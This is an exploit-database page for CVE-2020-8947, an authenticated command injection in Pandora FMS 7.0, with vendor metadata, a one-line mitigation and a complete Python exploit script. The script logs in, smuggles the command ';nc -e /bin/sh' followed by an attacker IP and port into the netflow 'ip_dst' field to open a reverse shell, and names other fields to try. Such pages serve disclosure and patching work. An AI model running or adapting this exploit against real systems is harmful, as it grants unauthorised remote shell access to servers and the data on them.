PANDORAFMS 7.0 - Authenticated Remote Code Execution

vendor:

PANDORAFMS

by:

Engin Demirbilek

7.2

CVSS

HIGH

Authenticated Remote Code Execution

CWE

Product Name: PANDORAFMS

Affected Version From: 7.0

Affected Version To: 7.0

Patch Exists: YES

Related CWE: CVE-2020-8947

CPE: a:pandorafms:pandorafms:7.0

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: CentOS

2020

PANDORAFMS 7.0 – Authenticated Remote Code Execution

This exploit can be used to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS. In case the default vulnerable variable won't work, the payload can be changed to one of the following ip_src, dst_port, src_port.

Mitigation:

Update to the latest version of PANDORAFMS 7.0

Source

Exploit-DB raw data:

# Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution
# Date: 2020-02-12
# Exploit Author: Engin Demirbilek
# Vendor homepage: http://pandorafms.org/
# Version: 7.0
# Software link: https://pandorafms.org/features/free-download-monitoring-software/
# Tested on: CentOS
# CVE: CVE-2020-8947

#!/bin/python
'''
PANDORAFMS 7.0 Authenticated Remote Code Execution x4
This exploits can be edited to exploit 4x Authenticated RCE vulnerabilities exist on PANDORAFMS.
incase default vulnerable variable won't work, change the position of payload to  one of the following ip_src, dst_port, src_port

Author: Engin Demirbilek
Github: github.com/EnginDemirbilek
CVE: CVE-2020-8947

'''
import requests
import sys

if len(sys.argv) < 6:
	print "Usage: ./exploit.py http://url username password listenerIP listenerPort"
	exit()

url = sys.argv[1]
user = sys.argv[2]
password = sys.argv[3]
payload = '";nc -e /bin/sh ' + sys.argv[4] + ' ' + sys.argv[5] + ' ' + '#'

login = {
	'nick':user,
	'pass':password,
	'login_button':'Login'
}
req = requests.Session()
print "Sendin login request ..."
login = req.post(url+"/pandora_console/index.php?login=1", data=login)

payload = {
	'date':"",
	'time':"",
	'period':"",
	'interval_length':"",
	'chart_type':"",
	'max_aggregates':"1",
        'address_resolution':"0",
        'name':"",
        'assign_group':"0",
        'filter_type':"0",
        'filter_id':"0",
        'filter_selected':"0",
        'ip_dst':payload,
	'ip_src':"",
	'dst_port':"",
	'src_port':"",
	'advanced_filter':"",
	'aggregate':"dstip",
	'router_ip':"",
	'output':"bytes",
	'draw_button':"Draw"
}

print "[+] Sendin exploit ..."

exploit = req.post(url+"/pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0",cookies=req.cookies, data=payload, headers={
'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded'})

if exploit.status_code == 200:
	print "[+] Everything seems ok, check your listener. If no connection established, change position of payload to ip_src, dst_port or src_port."
else:
	print "[-] Couldn't send the HTTP request, try again."